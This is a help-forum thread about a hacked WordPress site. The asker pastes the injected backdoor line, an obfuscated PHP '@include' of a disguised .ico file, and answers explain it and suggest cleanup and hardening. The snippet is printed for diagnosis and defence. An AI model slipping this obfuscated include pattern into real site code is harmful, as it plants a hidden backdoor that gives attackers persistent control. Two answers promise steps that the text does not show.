It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
@include " 57ho155e/151nt145r7 602/160ub154ic137ht155l/167p-151nc154ud145s/152s/164in171mc145/.146b4 63d6 700.151co";
/*6b9bb*/
I have changed:
- WP Admin URL and put strong password username
- changed cpanel/FTP password with strong one
- Implemented iTheme Security
- Updated WordPress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
3
Answers
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you’ll have to replace all files with fresh downloads. mostly it’s straight forward:
I faced this problem too, and step by step I did the steps below:
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/